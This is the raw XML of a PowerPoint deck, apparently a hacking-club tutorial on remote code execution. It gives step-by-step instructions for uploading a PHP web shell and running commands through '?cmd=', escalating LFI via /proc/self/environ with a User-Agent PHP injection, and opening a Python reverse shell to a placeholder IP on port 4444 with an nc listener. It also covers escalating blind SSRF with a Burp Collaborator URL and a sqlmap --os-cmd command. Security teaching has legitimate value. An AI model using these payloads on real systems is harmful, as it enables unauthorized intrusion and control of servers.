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60" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="26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exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.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exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.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695" y="0"/>
            <a:ext cx="59026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0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139" y="0"/>
            <a:ext cx="4593181" cy="1156063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RCE via blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssrf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49" y="0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to escalate blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>ssrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> to RCE: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http://exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> ?`whoami`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07" b="66487"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="444727" y="2379617"/>
            <a:ext cx="9679577" cy="22968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3" t="54860" r="24464" b="21315"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="366349" y="4676503"/>
            <a:ext cx="9757955" cy="1632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2" t="6570" r="10013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9797143" y="1"/>
            <a:ext cx="2394856" cy="1473756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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43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C07EF-A935-4F72-9839-8CA67F383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3" y="357809"/>
            <a:ext cx="5259387" cy="874643"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="32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r>
              <a:rPr lang="en-US" sz="3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Injection to RCE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3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616688-8D67-4CAD-930A-05E859769B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702365" y="955459"/>
            <a:ext cx="75272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we get SQL based error in website we can try to insert commands from SQLMAP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Command :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 err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –u {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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--random-agent --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os-cmd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whoami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BD6EA7-4A7A-426D-9E73-BED485049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609" y="2546431"/>
            <a:ext cx="6141940" cy="1630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A3788C-1BA5-463B-835D-B62738342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608" y="4386471"/>
            <a:ext cx="9252591" cy="211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00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7310" y="2216332"/>
            <a:ext cx="3796347" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>THANK you</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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17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047" y="2573382"/>
            <a:ext cx="9348061" cy="1247503"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Remote code execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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00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208" y="661851"/>
            <a:ext cx="9905998" cy="1637212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>TABLE of Contents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516" y="2170611"/>
            <a:ext cx="9905998" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What is remote code execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>RCE via file upload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="2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Injection to RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Rce via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>lfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Rce via blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ssrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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89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150" y="178525"/>
            <a:ext cx="9413008" cy="1042742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is remote code execution ?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44505" y="1221267"/>
            <a:ext cx="7741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IN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2" t="6570" r="10013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11103734" y="0"/>
            <a:ext cx="1088265" cy="669701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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F17D7E-B3F1-45C1-A914-DDA6A6A3AB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171" y="3597272"/>
            <a:ext cx="6178469" cy="314807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C0A1D4-559E-4EE2-87B1-347DA8351DE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744504" y="1156676"/>
            <a:ext cx="94130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/>
              <a:t>Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer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8C6F86-0E4E-4197-9681-0B40B05F2026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671150" y="2232692"/>
            <a:ext cx="76287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RCE vulnerabilities allow an attacker to execute  code on a remote device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5399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1257"/>
            <a:ext cx="7040291" cy="1014550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>RCE via file upload</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" u="sn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44724" y="1600200"/>
            <a:ext cx="10893833" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote code execution can be achieved through file upload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24" y="2447651"/>
            <a:ext cx="7536809" cy="27638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2" t="6570" r="10013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9581058" y="0"/>
            <a:ext cx="2610941" cy="1606731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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4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137" y="235130"/>
            <a:ext cx="5182188" cy="633549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>RCE via file upload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37" y="868679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Open text editor and paste the below command</a:t>
            </a:r>
          </a:p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 "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shell";system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($_get['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']); ?&gt;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Save the file with .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>extenstion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Upload the file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7" y="3738781"/>
            <a:ext cx="5953956" cy="2724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2" t="6570" r="10013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9581058" y="0"/>
            <a:ext cx="2610941" cy="1606731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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96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50" y="62049"/>
            <a:ext cx="6147661" cy="790303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Rce via file upload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950" y="263433"/>
            <a:ext cx="9905998" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now open the file you uploaded through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> add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?cmd=id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67" y="2143153"/>
            <a:ext cx="7401958" cy="155279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13950" y="2997926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Can a</a:t>
            </a:r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entury Gothic (Headings)"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lso try other commands ?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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entury Gothic (Headings)"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Century Gothic (Headings)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67" y="4852967"/>
            <a:ext cx="10073945" cy="12691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2" t="6570" r="10013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9581058" y="0"/>
            <a:ext cx="2610941" cy="1606731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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89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HackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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11" y="1604817"/>
            <a:ext cx="4894641" cy="338928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3139" y="0"/>
            <a:ext cx="4540929" cy="1068977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rce via LFI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A8B3FB-564A-4C11-A1C4-F240AC2E2D05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110948" y="816678"/>
            <a:ext cx="725689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 Look for the "/proc/self/environ" file,  If any part of the request is stored there,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After the file Type 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&amp;cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-I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python -c socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-I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","-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-I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"]);’ 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 User-agent header add: &lt;?php system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>']); &gt;&gt;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In Terminal Set listener ( nc –lv 4444)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Send the request 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923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139" y="0"/>
            <a:ext cx="4540929" cy="1068977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rce via blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssrf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534488"/>
            <a:ext cx="9905998" cy="4034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we encounter with blind hit while hunting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecslate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it to RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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14" b="72967"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475208" y="3019697"/>
            <a:ext cx="8934994" cy="1852749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="TheHackersClub - CyberSapie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116" y="5826034"/>
            <a:ext cx="925884" cy="103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10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816</TotalTime>
  <Words>392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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Century Gothic (Headings)</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Remote code execution</vt:lpstr>
      <vt:lpstr>TABLE of Contents</vt:lpstr>
      <vt:lpstr>What is remote code execution ?</vt:lpstr>
      <vt:lpstr>RCE via file upload</vt:lpstr>
      <vt:lpstr>RCE via file upload</vt:lpstr>
      <vt:lpstr>Rce via file upload</vt:lpstr>
      <vt:lpstr>Rce via LFI</vt:lpstr>
      <vt:lpstr>Rce via blind ssrf</vt:lpstr>
      <vt:lpstr>RCE via blind ssrf</vt:lpstr>
      <vt:lpstr>Sql Injection to RCE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Raif</dc:creator>
  <cp:lastModifiedBy>botwolf444@outlook.com</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-08T09:51:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-26T11:25:23Z</dcterms:modified>
</cp:coreProperties>
</file>